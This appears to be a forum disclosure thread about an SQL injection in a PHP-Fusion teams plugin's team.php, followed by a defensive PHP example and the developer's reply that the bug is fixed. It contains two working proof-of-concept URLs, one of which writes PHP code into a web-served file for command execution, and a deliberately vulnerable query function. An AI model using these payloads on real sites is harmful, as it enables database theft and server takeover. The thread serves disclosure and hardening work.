Plugin that allows the site to have a list of all teams / clubs (e.g. football or hockey) with the playing staff, displaying the standings with the position of each team, or a list of the best strikers of a championship.
Looking good, yes - but it has a possibility to insert an SQL injection.
Details: The "team_id" variable is probably not sanitized before being used in an SQL query in "team.php". The attack can be elevated, as shown in the second POC, to bypass PHP-Fusion's GET variable XSS filter by using back-ticks instead of the brackets used in any PHP function, in that case shell_exec().
Condition: magic_quotes_gpc = Off
POC:
* http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1' union select '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17
* http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1' union select '1','2','<?php $out=id;echo $out; ?>','4','5','6','7','8','9','10','11','12','13','14','15','16','17' into outfile '/var/www/php-fusion/files/images/test.php
While you're at it: an empty index.php file is missing in the following two maps: "locale" and "ink". I wonder how it got past the Addon Approval?
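The pattern behind the report above, shown as an added example that is not the teams_structure infusion's own code and not taken from PHP-Fusion: a constructed vulnerable query builder next to a hardened version. The table name, column name, the `$db` mysqli connection and the `mysqlnd`-backed `get_result()` call are assumptions; PHP-Fusion's core offers `isnum()` for the same integer check, but plain PHP is used here so the block runs outside the CMS.

```php
<?php
// Added example (not the infusion's or PHP-Fusion's code). Table/column names
// and the $db connection are assumptions.

// VULNERABLE PATTERN, constructed to mirror the report: the raw GET value is
// interpolated into the query. A single quote inside team_id closes the string
// literal and everything after it is parsed as SQL (the UNION in the POC).
// magic_quotes_gpc is not a fix: it was removed in PHP 5.4, so the query must
// not depend on it.
function build_team_query_vulnerable(string $team_id): string
{
    return "SELECT * FROM teams WHERE team_id='" . $team_id . "'";
}

// HARDENED step 1: validate the identifier as a positive integer before it
// gets anywhere near SQL. Anything else is rejected, not "cleaned".
function parse_team_id($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// HARDENED step 2: even with a validated integer, bind it as a parameter so the
// value can never be interpreted as SQL text.
function fetch_team(mysqli $db, $raw_team_id): ?array
{
    $team_id = parse_team_id($raw_team_id);
    if ($team_id === null) {
        // Not a team id: refuse the request instead of falling through.
        return null;
    }
    $stmt = $db->prepare("SELECT * FROM teams WHERE team_id = ?");
    $stmt->bind_param('i', $team_id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // assumes mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Offline check of the validator on constructed inputs shaped like the report.
$samples = [
    '17'                           => 17,
    "-1' union select '1','2','3"  => null, // shape of the POC, constructed
    '1 OR 1=1'                     => null,
    '0'                            => null, // below min_range
    ''                             => null,
];
foreach ($samples as $input => $expected) {
    $got = parse_team_id($input);
    if ($got !== $expected) {
        throw new RuntimeException("parse_team_id('$input') returned " . var_export($got, true));
    }
}
echo "validator ok\n";
```

The second POC also needs the MySQL account to hold the FILE privilege and a web-served directory (here `files/images`) to be writable by the database server; denying both limits the impact of any remaining injection to data disclosure rather than code execution.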
@smokeman, I fixed the bug. I want to again say thank you for your timely information ... In the coming days, I plan to release v4.0, which will have everything fixed and new functions.